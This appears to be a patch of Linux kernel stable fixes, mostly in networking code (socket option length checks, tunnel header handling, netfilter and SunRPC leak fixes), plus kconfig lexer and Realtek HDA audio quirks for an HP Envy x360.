+diff --git a/net/ipv4/inet_timewait_sock.c b/net/ipv4/inet_timewait_sock.c
+index 1d77d992e6e77..340a8f0c29800 100644
+--- a/net/ipv4/inet_timewait_sock.c
++++ b/net/ipv4/inet_timewait_sock.c
+@@ -281,12 +281,12 @@ void __inet_twsk_schedule(struct inet_timewait_sock *tw, int timeo, bool rearm)
+ }
+ EXPORT_SYMBOL_GPL(__inet_twsk_schedule);
+ 
++/* Remove all non full sockets (TIME_WAIT and NEW_SYN_RECV) for dead netns */
+ void inet_twsk_purge(struct inet_hashinfo *hashinfo, int family)
+ {
+-	struct inet_timewait_sock *tw;
+-	struct sock *sk;
+ 	struct hlist_nulls_node *node;
+ 	unsigned int slot;
++	struct sock *sk;
+ 
+ 	for (slot = 0; slot <= hashinfo->ehash_mask; slot++) {
+ 		struct inet_ehash_bucket *head = &hashinfo->ehash[slot];
+@@ -295,38 +295,35 @@ void inet_twsk_purge(struct inet_hashinfo *hashinfo, int family)
+ 		rcu_read_lock();
+ restart:
+ 		sk_nulls_for_each_rcu(sk, node, &head->chain) {
+-			if (sk->sk_state != TCP_TIME_WAIT) {
+-				/* A kernel listener socket might not hold refcnt for net,
+-				 * so reqsk_timer_handler() could be fired after net is
+-				 * freed.  Userspace listener and reqsk never exist here.
+-				 */
+-				if (unlikely(sk->sk_state == TCP_NEW_SYN_RECV &&
+-					     hashinfo->pernet)) {
+-					struct request_sock *req = inet_reqsk(sk);
+-
+-					inet_csk_reqsk_queue_drop_and_put(req->rsk_listener, req);
+-				}
++			int state = inet_sk_state_load(sk);
+ 
++			if ((1 << state) & ~(TCPF_TIME_WAIT |
++					     TCPF_NEW_SYN_RECV))
+ 				continue;
+-			}
+ 
+-			tw = inet_twsk(sk);
+-			if ((tw->tw_family != family) ||
+-				refcount_read(&twsk_net(tw)->ns.count))
++			if (sk->sk_family != family ||
++			    refcount_read(&sock_net(sk)->ns.count))
+ 				continue;
+ 
+-			if (unlikely(!refcount_inc_not_zero(&tw->tw_refcnt)))
++			if (unlikely(!refcount_inc_not_zero(&sk->sk_refcnt)))
+ 				continue;
+ 
+-			if (unlikely((tw->tw_family != family) ||
+-				     refcount_read(&twsk_net(tw)->ns.count))) {
+-				inet_twsk_put(tw);
++			if (unlikely(sk->sk_family != family ||
++				     refcount_read(&sock_net(sk)->ns.count))) {
++				sock_gen_put(sk);
+ 				goto restart;
+ 			}
+ 
+ 			rcu_read_unlock();
+ 			local_bh_disable();
+-			inet_twsk_deschedule_put(tw);
++			if (state == TCP_TIME_WAIT) {
++				inet_twsk_deschedule_put(inet_twsk(sk));
++			} else {
++				struct request_sock *req = inet_reqsk(sk);
++
++				inet_csk_reqsk_queue_drop_and_put(req->rsk_listener,
++								  req);
++			}
+ 			local_bh_enable();
+ 			goto restart_rcu;
+ 		}
+diff --git a/net/ipv4/ip_tunnel.c b/net/ipv4/ip_tunnel.c
+index 328f9068c6a43..3445e576b05bc 100644
+--- a/net/ipv4/ip_tunnel.c
++++ b/net/ipv4/ip_tunnel.c
+@@ -364,7 +364,7 @@ int ip_tunnel_rcv(struct ip_tunnel *tunnel, struct sk_buff *skb,
+ 		  bool log_ecn_error)
+ {
+ 	const struct iphdr *iph = ip_hdr(skb);
+-	int err;
++	int nh, err;
+ 
+ #ifdef CONFIG_NET_IPGRE_BROADCAST
+ 	if (ipv4_is_multicast(iph->daddr)) {
+@@ -390,8 +390,21 @@ int ip_tunnel_rcv(struct ip_tunnel *tunnel, struct sk_buff *skb,
+ 		tunnel->i_seqno = ntohl(tpi->seq) + 1;
+ 	}
+ 
++	/* Save offset of outer header relative to skb->head,
++	 * because we are going to reset the network header to the inner header
++	 * and might change skb->head.
++	 */
++	nh = skb_network_header(skb) - skb->head;
++
+ 	skb_set_network_header(skb, (tunnel->dev->type == ARPHRD_ETHER) ? ETH_HLEN : 0);
+ 
++	if (!pskb_inet_may_pull(skb)) {
++		DEV_STATS_INC(tunnel->dev, rx_length_errors);
++		DEV_STATS_INC(tunnel->dev, rx_errors);
++		goto drop;
++	}
++	iph = (struct iphdr *)(skb->head + nh);
++
+ 	err = IP_ECN_decapsulate(iph, skb);
+ 	if (unlikely(err)) {
+ 		if (log_ecn_error)
+diff --git a/net/ipv4/ipmr.c b/net/ipv4/ipmr.c
+index d5421c38c2aae..3ed9ed2bffd29 100644
+--- a/net/ipv4/ipmr.c
++++ b/net/ipv4/ipmr.c
+@@ -1581,9 +1581,11 @@ int ip_mroute_getsockopt(struct sock *sk, int optname, sockptr_t optval,
+ 
+ 	if (copy_from_sockptr(&olr, optlen, sizeof(int)))
+ 		return -EFAULT;
+-	olr = min_t(unsigned int, olr, sizeof(int));
+ 	if (olr < 0)
+ 		return -EINVAL;
++
++	olr = min_t(unsigned int, olr, sizeof(int));
++
+ 	if (copy_to_sockptr(optlen, &olr, sizeof(int)))
+ 		return -EFAULT;
+ 	if (copy_to_sockptr(optval, &val, olr))
+diff --git a/net/ipv4/raw.c b/net/ipv4/raw.c
+index 7c63b91edbf7a..ee0efd0efec40 100644
+--- a/net/ipv4/raw.c
++++ b/net/ipv4/raw.c
+@@ -348,6 +348,7 @@ static int raw_send_hdrinc(struct sock *sk, struct flowi4 *fl4,
+ 		goto error;
+ 	skb_reserve(skb, hlen);
+ 
++	skb->protocol = htons(ETH_P_IP);
+ 	skb->priority = READ_ONCE(sk->sk_priority);
+ 	skb->mark = sockc->mark;
+ 	skb->tstamp = sockc->transmit_time;
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 86e7695d91adf..5a165e29f7be4 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -4102,11 +4102,11 @@ int do_tcp_getsockopt(struct sock *sk, int level,
+ 	if (copy_from_sockptr(&len, optlen, sizeof(int)))
+ 		return -EFAULT;
+ 
+-	len = min_t(unsigned int, len, sizeof(int));
+-
+ 	if (len < 0)
+ 		return -EINVAL;
+ 
++	len = min_t(unsigned int, len, sizeof(int));
++
+ 	switch (optname) {
+ 	case TCP_MAXSEG:
+ 		val = tp->mss_cache;
+diff --git a/net/ipv4/tcp_minisocks.c b/net/ipv4/tcp_minisocks.c
+index 42844d20da020..b3bfa1a09df68 100644
+--- a/net/ipv4/tcp_minisocks.c
++++ b/net/ipv4/tcp_minisocks.c
+@@ -357,10 +357,6 @@ void tcp_twsk_purge(struct list_head *net_exit_list, int family)
+ 			/* Even if tw_refcount == 1, we must clean up kernel reqsk */
+ 			inet_twsk_purge(net->ipv4.tcp_death_row.hashinfo, family);
+ 		} else if (!purged_once) {
+-			/* The last refcount is decremented in tcp_sk_exit_batch() */
+-			if (refcount_read(&net->ipv4.tcp_death_row.tw_refcount) == 1)
+-				continue;
+-
+ 			inet_twsk_purge(&tcp_hashinfo, family);
+ 			purged_once = true;
+ 		}
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 87d759bab0012..7856b7a3e0ee9 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -2790,11 +2790,11 @@ int udp_lib_getsockopt(struct sock *sk, int level, int optname,
+ 	if (get_user(len, optlen))
+ 		return -EFAULT;
+ 
+-	len = min_t(unsigned int, len, sizeof(int));
+-
+ 	if (len < 0)
+ 		return -EINVAL;
+ 
++	len = min_t(unsigned int, len, sizeof(int));
++
+ 	switch (optname) {
+ 	case UDP_CORK:
+ 		val = udp_test_bit(CORK, sk);
+diff --git a/net/ipv6/fib6_rules.c b/net/ipv6/fib6_rules.c
+index 7c20038330104..be52b18e08a6b 100644
+--- a/net/ipv6/fib6_rules.c
++++ b/net/ipv6/fib6_rules.c
+@@ -449,6 +449,11 @@ static size_t fib6_rule_nlmsg_payload(struct fib_rule *rule)
+ 	       + nla_total_size(16); /* src */
+ }
+ 
++static void fib6_rule_flush_cache(struct fib_rules_ops *ops)
++{
++	rt_genid_bump_ipv6(ops->fro_net);
++}
++
+ static const struct fib_rules_ops __net_initconst fib6_rules_ops_template = {
+ 	.family			= AF_INET6,
+ 	.rule_size		= sizeof(struct fib6_rule),
+@@ -461,6 +466,7 @@ static const struct fib_rules_ops __net_initconst fib6_rules_ops_template = {
+ 	.compare		= fib6_rule_compare,
+ 	.fill			= fib6_rule_fill,
+ 	.nlmsg_payload		= fib6_rule_nlmsg_payload,
++	.flush_cache		= fib6_rule_flush_cache,
+ 	.nlgroup		= RTNLGRP_IPV6_RULE,
+ 	.owner			= THIS_MODULE,
+ 	.fro_net		= &init_net,
+diff --git a/net/ipv6/mcast.c b/net/ipv6/mcast.c
+index 566f3b7b957e9..a777695389403 100644
+--- a/net/ipv6/mcast.c
++++ b/net/ipv6/mcast.c
+@@ -2722,7 +2722,6 @@ void ipv6_mc_down(struct inet6_dev *idev)
+ 	/* Should stop work after group drop. or we will
+ 	 * start work again in mld_ifc_event()
+ 	 */
+-	synchronize_net();
+ 	mld_query_stop_work(idev);
+ 	mld_report_stop_work(idev);
+ 
+diff --git a/net/iucv/iucv.c b/net/iucv/iucv.c
+index fc3fddeb6f36d..f66b5f74cd83a 100644
+--- a/net/iucv/iucv.c
++++ b/net/iucv/iucv.c
+@@ -156,7 +156,7 @@ static char iucv_error_pathid[16] = "INVALID PATHID";
+ static LIST_HEAD(iucv_handler_list);
+ 
+ /*
+- * iucv_path_table: an array of iucv_path structures.
++ * iucv_path_table: array of pointers to iucv_path structures.
+  */
+ static struct iucv_path **iucv_path_table;
+ static unsigned long iucv_max_pathid;
+@@ -544,7 +544,7 @@ static int iucv_enable(void)
+ 
+ 	cpus_read_lock();
+ 	rc = -ENOMEM;
+-	alloc_size = iucv_max_pathid * sizeof(struct iucv_path);
++	alloc_size = iucv_max_pathid * sizeof(*iucv_path_table);
+ 	iucv_path_table = kzalloc(alloc_size, GFP_KERNEL);
+ 	if (!iucv_path_table)
+ 		goto out;
+diff --git a/net/kcm/kcmsock.c b/net/kcm/kcmsock.c
+index 65845c59c0655..7d37bf4334d26 100644
+--- a/net/kcm/kcmsock.c
++++ b/net/kcm/kcmsock.c
+@@ -1274,10 +1274,11 @@ static int kcm_getsockopt(struct socket *sock, int level, int optname,
+ 	if (get_user(len, optlen))
+ 		return -EFAULT;
+ 
+-	len = min_t(unsigned int, len, sizeof(int));
+ 	if (len < 0)
+ 		return -EINVAL;
+ 
++	len = min_t(unsigned int, len, sizeof(int));
++
+ 	switch (optname) {
+ 	case KCM_RECV_DISABLE:
+ 		val = kcm->rx_disabled;
+diff --git a/net/l2tp/l2tp_ppp.c b/net/l2tp/l2tp_ppp.c
+index f011af6601c9c..6146e4e67bbb5 100644
+--- a/net/l2tp/l2tp_ppp.c
++++ b/net/l2tp/l2tp_ppp.c
+@@ -1356,11 +1356,11 @@ static int pppol2tp_getsockopt(struct socket *sock, int level, int optname,
+ 	if (get_user(len, optlen))
+ 		return -EFAULT;
+ 
+-	len = min_t(unsigned int, len, sizeof(int));
+-
+ 	if (len < 0)
+ 		return -EINVAL;
+ 
++	len = min_t(unsigned int, len, sizeof(int));
++
+ 	err = -ENOTCONN;
+ 	if (!sk->sk_user_data)
+ 		goto end;
+diff --git a/net/mac80211/rate.c b/net/mac80211/rate.c
+index d5ea5f5bcf3a0..9d33fd2377c88 100644
+--- a/net/mac80211/rate.c
++++ b/net/mac80211/rate.c
+@@ -119,7 +119,8 @@ void rate_control_rate_update(struct ieee80211_local *local,
+ 		rcu_read_unlock();
+ 	}
+ 
+-	drv_sta_rc_update(local, sta->sdata, &sta->sta, changed);
++	if (sta->uploaded)
++		drv_sta_rc_update(local, sta->sdata, &sta->sta, changed);
+ }
+ 
+ int ieee80211_rate_control_register(const struct rate_control_ops *ops)
+diff --git a/net/mctp/route.c b/net/mctp/route.c
+index 0144d8ebdaefb..05ab4fddc82e9 100644
+--- a/net/mctp/route.c
++++ b/net/mctp/route.c
+@@ -843,6 +843,9 @@ static int mctp_do_fragment_route(struct mctp_route *rt, struct sk_buff *skb,
+ 		/* copy message payload */
+ 		skb_copy_bits(skb, pos, skb_transport_header(skb2), size);
+ 
++		/* we need to copy the extensions, for MCTP flow data */
++		skb_ext_copy(skb2, skb);
++
+ 		/* do route */
+ 		rc = rt->output(rt, skb2);
+ 		if (rc)
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index d3ba947f43761..0a86c019a75de 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -1205,7 +1205,7 @@ static int nf_tables_updtable(struct nft_ctx *ctx)
+ 	if (flags & ~NFT_TABLE_F_MASK)
+ 		return -EOPNOTSUPP;
+ 
+-	if (flags == ctx->table->flags)
++	if (flags == (ctx->table->flags & NFT_TABLE_F_MASK))
+ 		return 0;
+ 
+ 	if ((nft_table_has_owner(ctx->table) &&
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index e1969209b3abb..58eca26162735 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -2240,8 +2240,6 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,
+ 	if (m) {
+ 		rcu_barrier();
+ 
+-		nft_set_pipapo_match_destroy(ctx, set, m);
+-
+ 		for_each_possible_cpu(cpu)
+ 			pipapo_free_scratch(m, cpu);
+ 		free_percpu(m->scratch);
+@@ -2253,8 +2251,7 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,
+ 	if (priv->clone) {
+ 		m = priv->clone;
+ 
+-		if (priv->dirty)
+-			nft_set_pipapo_match_destroy(ctx, set, m);
++		nft_set_pipapo_match_destroy(ctx, set, m);
+ 
+ 		for_each_possible_cpu(cpu)
+ 			pipapo_free_scratch(priv->clone, cpu);
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index c3117350f5fbb..7188ca8d84693 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -3981,7 +3981,7 @@ packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
+ 		if (val < 0 || val > 1)
+ 			return -EINVAL;
+ 
+-		po->prot_hook.ignore_outgoing = !!val;
++		WRITE_ONCE(po->prot_hook.ignore_outgoing, !!val);
+ 		return 0;
+ 	}
+ 	case PACKET_TX_HAS_OFF:
+@@ -4110,7 +4110,7 @@ static int packet_getsockopt(struct socket *sock, int level, int optname,
+ 		       0);
+ 		break;
+ 	case PACKET_IGNORE_OUTGOING:
+-		val = po->prot_hook.ignore_outgoing;
++		val = READ_ONCE(po->prot_hook.ignore_outgoing);
+ 		break;
+ 	case PACKET_ROLLOVER_STATS:
+ 		if (!po->rollover)
+diff --git a/net/rds/send.c b/net/rds/send.c
+index a4ba45c430d81..0005fb43f2dfa 100644
+--- a/net/rds/send.c
++++ b/net/rds/send.c
+@@ -103,13 +103,12 @@ EXPORT_SYMBOL_GPL(rds_send_path_reset);
+ 
+ static int acquire_in_xmit(struct rds_conn_path *cp)
+ {
+-	return test_and_set_bit(RDS_IN_XMIT, &cp->cp_flags) == 0;
++	return test_and_set_bit_lock(RDS_IN_XMIT, &cp->cp_flags) == 0;
+ }
+ 
+ static void release_in_xmit(struct rds_conn_path *cp)
+ {
+-	clear_bit(RDS_IN_XMIT, &cp->cp_flags);
+-	smp_mb__after_atomic();
++	clear_bit_unlock(RDS_IN_XMIT, &cp->cp_flags);
+ 	/*
+ 	 * We don't use wait_on_bit()/wake_up_bit() because our waking is in a
+ 	 * hot path and finding waiters is very rare.  We don't want to walk
+diff --git a/net/sched/sch_taprio.c b/net/sched/sch_taprio.c
+index 8d5eebb2dd1b1..1d4638aa4254f 100644
+--- a/net/sched/sch_taprio.c
++++ b/net/sched/sch_taprio.c
+@@ -765,7 +765,8 @@ static const struct nla_policy entry_policy[TCA_TAPRIO_SCHED_ENTRY_MAX + 1] = {
+ };
+ 
+ static const struct nla_policy taprio_tc_policy[TCA_TAPRIO_TC_ENTRY_MAX + 1] = {
+-	[TCA_TAPRIO_TC_ENTRY_INDEX]	   = { .type = NLA_U32 },
++	[TCA_TAPRIO_TC_ENTRY_INDEX]	   = NLA_POLICY_MAX(NLA_U32,
++							    TC_QOPT_MAX_QUEUE),
+ 	[TCA_TAPRIO_TC_ENTRY_MAX_SDU]	   = { .type = NLA_U32 },
+ };
+ 
+diff --git a/net/sunrpc/addr.c b/net/sunrpc/addr.c
+index d435bffc61999..97ff11973c493 100644
+--- a/net/sunrpc/addr.c
++++ b/net/sunrpc/addr.c
+@@ -284,10 +284,10 @@ char *rpc_sockaddr2uaddr(const struct sockaddr *sap, gfp_t gfp_flags)
+ 	}
+ 
+ 	if (snprintf(portbuf, sizeof(portbuf),
+-		     ".%u.%u", port >> 8, port & 0xff) > (int)sizeof(portbuf))
++		     ".%u.%u", port >> 8, port & 0xff) >= (int)sizeof(portbuf))
+ 		return NULL;
+ 
+-	if (strlcat(addrbuf, portbuf, sizeof(addrbuf)) > sizeof(addrbuf))
++	if (strlcat(addrbuf, portbuf, sizeof(addrbuf)) >= sizeof(addrbuf))
+ 		return NULL;
+ 
+ 	return kstrdup(addrbuf, gfp_flags);
+diff --git a/net/sunrpc/auth_gss/gss_rpc_xdr.c b/net/sunrpc/auth_gss/gss_rpc_xdr.c
+index d79f12c2550ac..cb32ab9a83952 100644
+--- a/net/sunrpc/auth_gss/gss_rpc_xdr.c
++++ b/net/sunrpc/auth_gss/gss_rpc_xdr.c
+@@ -250,8 +250,8 @@ static int gssx_dec_option_array(struct xdr_stream *xdr,
+ 
+ 	creds = kzalloc(sizeof(struct svc_cred), GFP_KERNEL);
+ 	if (!creds) {
+-		kfree(oa->data);
+-		return -ENOMEM;
++		err = -ENOMEM;
++		goto free_oa;
+ 	}
+ 
+ 	oa->data[0].option.data = CREDS_VALUE;
+@@ -265,29 +265,40 @@ static int gssx_dec_option_array(struct xdr_stream *xdr,
+ 
+ 		/* option buffer */
+ 		p = xdr_inline_decode(xdr, 4);
+-		if (unlikely(p == NULL))
+-			return -ENOSPC;
++		if (unlikely(p == NULL)) {
++			err = -ENOSPC;
++			goto free_creds;
++		}
+ 
+ 		length = be32_to_cpup(p);
+ 		p = xdr_inline_decode(xdr, length);
+-		if (unlikely(p == NULL))
+-			return -ENOSPC;
++		if (unlikely(p == NULL)) {
++			err = -ENOSPC;
++			goto free_creds;
++		}
+ 
+ 		if (length == sizeof(CREDS_VALUE) &&
+ 		    memcmp(p, CREDS_VALUE, sizeof(CREDS_VALUE)) == 0) {
+ 			/* We have creds here. parse them */
+ 			err = gssx_dec_linux_creds(xdr, creds);
+ 			if (err)
+-				return err;
++				goto free_creds;
+ 			oa->data[0].value.len = 1; /* presence */
+ 		} else {
+ 			/* consume uninteresting buffer */
+ 			err = gssx_dec_buffer(xdr, &dummy);
+ 			if (err)
+-				return err;
++				goto free_creds;
+ 		}
+ 	}
+ 	return 0;
++
++free_creds:
++	kfree(creds);
++free_oa:
++	kfree(oa->data);
++	oa->data = NULL;
++	return err;
+ }
+ 
+ static int gssx_dec_status(struct xdr_stream *xdr,
+diff --git a/net/unix/garbage.c b/net/unix/garbage.c
+index ab2c83d58b62a..9bfffe2a7f020 100644
+--- a/net/unix/garbage.c
++++ b/net/unix/garbage.c
+@@ -198,7 +198,7 @@ void wait_for_unix_gc(void)
+ 	if (READ_ONCE(unix_tot_inflight) > UNIX_INFLIGHT_TRIGGER_GC &&
+ 	    !READ_ONCE(gc_in_progress))
+ 		unix_gc();
+-	wait_event(unix_gc_wait, gc_in_progress == false);
++	wait_event(unix_gc_wait, !READ_ONCE(gc_in_progress));
+ }
+ 
+ /* The external entry point: unix_gc() */
+diff --git a/net/unix/scm.c b/net/unix/scm.c
+index e8e2a00bb0f58..d1048b4c2baaf 100644
+--- a/net/unix/scm.c
++++ b/net/unix/scm.c
+@@ -34,10 +34,8 @@ struct sock *unix_get_socket(struct file *filp)
+ 		/* PF_UNIX ? */
+ 		if (s && sock->ops && sock->ops->family == PF_UNIX)
+ 			u_sock = s;
+-	} else {
+-		/* Could be an io_uring instance */
+-		u_sock = io_uring_get_socket(filp);
+ 	}
++
+ 	return u_sock;
+ }
+ EXPORT_SYMBOL(unix_get_socket);
+diff --git a/net/x25/af_x25.c b/net/x25/af_x25.c
+index 5c7ad301d742e..5a8b2ea56564e 100644
+--- a/net/x25/af_x25.c
++++ b/net/x25/af_x25.c
+@@ -460,12 +460,12 @@ static int x25_getsockopt(struct socket *sock, int level, int optname,
+ 	if (get_user(len, optlen))
+ 		goto out;
+ 
+-	len = min_t(unsigned int, len, sizeof(int));
+-
+ 	rc = -EINVAL;
+ 	if (len < 0)
+ 		goto out;
+ 
++	len = min_t(unsigned int, len, sizeof(int));
++
+ 	rc = -EFAULT;
+ 	if (put_user(len, optlen))
+ 		goto out;
+diff --git a/scripts/clang-tools/gen_compile_commands.py b/scripts/clang-tools/gen_compile_commands.py
+index d800b2c0af977..4f414ab706bd8 100755
+--- a/scripts/clang-tools/gen_compile_commands.py
++++ b/scripts/clang-tools/gen_compile_commands.py
+@@ -170,7 +170,7 @@ def process_line(root_directory, command_prefix, file_path):
+     # escape the pound sign '#', either as '\#' or '$(pound)' (depending on the
+     # kernel version). The compile_commands.json file is not interepreted
+     # by Make, so this code replaces the escaped version with '#'.
+-    prefix = command_prefix.replace('\#', '#').replace('$(pound)', '#')
++    prefix = command_prefix.replace(r'\#', '#').replace('$(pound)', '#')
+ 
+     # Use os.path.abspath() to normalize the path resolving '.' and '..' .
+     abs_path = os.path.abspath(os.path.join(root_directory, file_path))
+diff --git a/scripts/kconfig/lexer.l b/scripts/kconfig/lexer.l
+index cc386e4436834..2c2b3e6f248ca 100644
+--- a/scripts/kconfig/lexer.l
++++ b/scripts/kconfig/lexer.l
+@@ -302,8 +302,11 @@ static char *expand_token(const char *in, size_t n)
+ 	new_string();
+ 	append_string(in, n);
+ 
+-	/* get the whole line because we do not know the end of token. */
+-	while ((c = input()) != EOF) {
++	/*
++	 * get the whole line because we do not know the end of token.
++	 * input() returns 0 (not EOF!) when it reachs the end of file.
++	 */
++	while ((c = input()) != 0) {
+ 		if (c == '\n') {
+ 			unput(c);
+ 			break;
+diff --git a/sound/core/seq/seq_midi.c b/sound/core/seq/seq_midi.c
+index 4589aac091542..b00bbf18a6f5d 100644
+--- a/sound/core/seq/seq_midi.c
++++ b/sound/core/seq/seq_midi.c
+@@ -112,6 +112,12 @@ static int dump_midi(struct snd_rawmidi_substream *substream, const char *buf, i
+ 	return 0;
+ }
+ 
++/* callback for snd_seq_dump_var_event(), bridging to dump_midi() */
++static int __dump_midi(void *ptr, void *buf, int count)
++{
++	return dump_midi(ptr, buf, count);
++}
++
+ static int event_process_midi(struct snd_seq_event *ev, int direct,
+ 			      void *private_data, int atomic, int hop)
+ {
+@@ -131,7 +137,7 @@ static int event_process_midi(struct snd_seq_event *ev, int direct,
+ 			pr_debug("ALSA: seq_midi: invalid sysex event flags = 0x%x\n", ev->flags);
+ 			return 0;
+ 		}
+-		snd_seq_dump_var_event(ev, (snd_seq_dump_func_t)dump_midi, substream);
++		snd_seq_dump_var_event(ev, __dump_midi, substream);
+ 		snd_midi_event_reset_decode(msynth->parser);
+ 	} else {
+ 		if (msynth->parser == NULL)
+diff --git a/sound/core/seq/seq_virmidi.c b/sound/core/seq/seq_virmidi.c
+index f5cae49500c81..ffd8e7202c334 100644
+--- a/sound/core/seq/seq_virmidi.c
++++ b/sound/core/seq/seq_virmidi.c
+@@ -62,6 +62,13 @@ static void snd_virmidi_init_event(struct snd_virmidi *vmidi,
+ /*
+  * decode input event and put to read buffer of each opened file
+  */
++
++/* callback for snd_seq_dump_var_event(), bridging to snd_rawmidi_receive() */
++static int dump_to_rawmidi(void *ptr, void *buf, int count)
++{
++	return snd_rawmidi_receive(ptr, buf, count);
++}
++
+ static int snd_virmidi_dev_receive_event(struct snd_virmidi_dev *rdev,
+ 					 struct snd_seq_event *ev,
+ 					 bool atomic)
+@@ -80,7 +87,7 @@ static int snd_virmidi_dev_receive_event(struct snd_virmidi_dev *rdev,
+ 		if (ev->type == SNDRV_SEQ_EVENT_SYSEX) {
+ 			if ((ev->flags & SNDRV_SEQ_EVENT_LENGTH_MASK) != SNDRV_SEQ_EVENT_LENGTH_VARIABLE)
+ 				continue;
+-			snd_seq_dump_var_event(ev, (snd_seq_dump_func_t)snd_rawmidi_receive, vmidi->substream);
++			snd_seq_dump_var_event(ev, dump_to_rawmidi, vmidi->substream);
+ 			snd_midi_event_reset_decode(vmidi->parser);
+ 		} else {
+ 			len = snd_midi_event_decode(vmidi->parser, msg, sizeof(msg), ev);
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 75bd7b2fa4ee6..6e759032eba2e 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -3681,6 +3681,7 @@ static void alc285_hp_init(struct hda_codec *codec)
+ 	int i, val;
+ 	int coef38, coef0d, coef36;
+ 
++	alc_write_coefex_idx(codec, 0x58, 0x00, 0x1888); /* write default value */
+ 	alc_update_coef_idx(codec, 0x4a, 1<<15, 1<<15); /* Reset HP JD */
+ 	coef38 = alc_read_coef_idx(codec, 0x38); /* Amp control */
+ 	coef0d = alc_read_coef_idx(codec, 0x0d); /* Digital Misc control */
+@@ -6692,6 +6693,60 @@ static void alc285_fixup_hp_spectre_x360(struct hda_codec *codec,
+ 	}
+ }
+ 
++static void alc285_fixup_hp_envy_x360(struct hda_codec *codec,
++				      const struct hda_fixup *fix,
++				      int action)
++{
++	static const struct coef_fw coefs[] = {
++		WRITE_COEF(0x08, 0x6a0c), WRITE_COEF(0x0d, 0xa023),
++		WRITE_COEF(0x10, 0x0320), WRITE_COEF(0x1a, 0x8c03),
++		WRITE_COEF(0x25, 0x1800), WRITE_COEF(0x26, 0x003a),
++		WRITE_COEF(0x28, 0x1dfe), WRITE_COEF(0x29, 0xb014),
++		WRITE_COEF(0x2b, 0x1dfe), WRITE_COEF(0x37, 0xfe15),
++		WRITE_COEF(0x38, 0x7909), WRITE_COEF(0x45, 0xd489),
++		WRITE_COEF(0x46, 0x00f4), WRITE_COEF(0x4a, 0x21e0),
++		WRITE_COEF(0x66, 0x03f0), WRITE_COEF(0x67, 0x1000),
++		WRITE_COEF(0x6e, 0x1005), { }
++	};
++
++	static const struct hda_pintbl pincfgs[] = {
++		{ 0x12, 0xb7a60130 },  /* Internal microphone*/
++		{ 0x14, 0x90170150 },  /* B&O soundbar speakers */
++		{ 0x17, 0x90170153 },  /* Side speakers */
++		{ 0x19, 0x03a11040 },  /* Headset microphone */
++		{ }
++	};
++
++	switch (action) {
++	case HDA_FIXUP_ACT_PRE_PROBE:
++		snd_hda_apply_pincfgs(codec, pincfgs);
++
++		/* Fixes volume control problem for side speakers */
++		alc295_fixup_disable_dac3(codec, fix, action);
++
++		/* Fixes no sound from headset speaker */
++		snd_hda_codec_amp_stereo(codec, 0x21, HDA_OUTPUT, 0, -1, 0);
++
++		/* Auto-enable headset mic when plugged */
++		snd_hda_jack_set_gating_jack(codec, 0x19, 0x21);
++
++		/* Headset mic volume enhancement */
++		snd_hda_codec_set_pin_target(codec, 0x19, PIN_VREF50);
++		break;
++	case HDA_FIXUP_ACT_INIT:
++		alc_process_coef_fw(codec, coefs);
++		break;
++	case HDA_FIXUP_ACT_BUILD:
++		rename_ctl(codec, "Bass Speaker Playback Volume",
++			   "B&O-Tuned Playback Volume");
++		rename_ctl(codec, "Front Playback Switch",
++			   "B&O Soundbar Playback Switch");
++		rename_ctl(codec, "Bass Speaker Playback Switch",
++			   "Side Speaker Playback Switch");
++		break;
++	}
++}
++
+ /* for hda_fixup_thinkpad_acpi() */
+ #include "thinkpad_helper.c"
+ 
+@@ -7130,6 +7185,7 @@ enum {
+ 	ALC280_FIXUP_HP_9480M,
+ 	ALC245_FIXUP_HP_X360_AMP,
+ 	ALC285_FIXUP_HP_SPECTRE_X360_EB1,
++	ALC285_FIXUP_HP_ENVY_X360,
+ 	ALC288_FIXUP_DELL_HEADSET_MODE,
+ 	ALC288_FIXUP_DELL1_MIC_NO_PRESENCE,
+ 	ALC288_FIXUP_DELL_XPS_13,
+@@ -9053,6 +9109,12 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc285_fixup_hp_spectre_x360_eb1
+ 	},
++	[ALC285_FIXUP_HP_ENVY_X360] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc285_fixup_hp_envy_x360,
++		.chained = true,
++		.chain_id = ALC285_FIXUP_HP_GPIO_AMP_INIT,
++	},
+ 	[ALC287_FIXUP_IDEAPAD_BASS_SPK_AMP] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc285_fixup_ideapad_s740_coef,
+@@ -9594,6 +9656,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x84e7, "HP Pavilion 15", ALC269_FIXUP_HP_MUTE_LED_MIC3),
+ 	SND_PCI_QUIRK(0x103c, 0x8519, "HP Spectre x360 15-df0xxx", ALC285_FIXUP_HP_SPECTRE_X360),
+ 	SND_PCI_QUIRK(0x103c, 0x8537, "HP ProBook 440 G6", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x85de, "HP Envy x360 13-ar0xxx", ALC285_FIXUP_HP_ENVY_X360),
+ 	SND_PCI_QUIRK(0x103c, 0x860f, "HP ZBook 15 G6", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x861f, "HP Elite Dragonfly G1", ALC285_FIXUP_HP_GPIO_AMP_INIT),
